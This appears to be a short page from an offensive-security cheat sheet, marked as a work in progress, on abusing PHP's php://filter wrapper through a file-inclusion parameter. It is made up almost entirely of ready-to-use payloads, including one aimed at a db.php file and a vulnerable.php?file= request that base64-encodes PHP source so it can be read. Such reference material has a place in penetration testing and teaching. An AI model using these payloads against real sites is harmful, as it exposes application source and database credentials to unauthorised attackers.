PHP - Bypass using filters (WIP)
php://filter/convert.base64-encode/resource=$pathToPHPfile
php://filter/convert.base64-encode/resource=db.php #Example with a default php dbvulnerable.php?file=php://filter/convert.base64-encode/resource=$pathToPHPfilePreviousPHP - Abuse PHP Type Juggling (WIP)NextWordPress - Abuse Theme Configuration on templates (WIP)
Last updated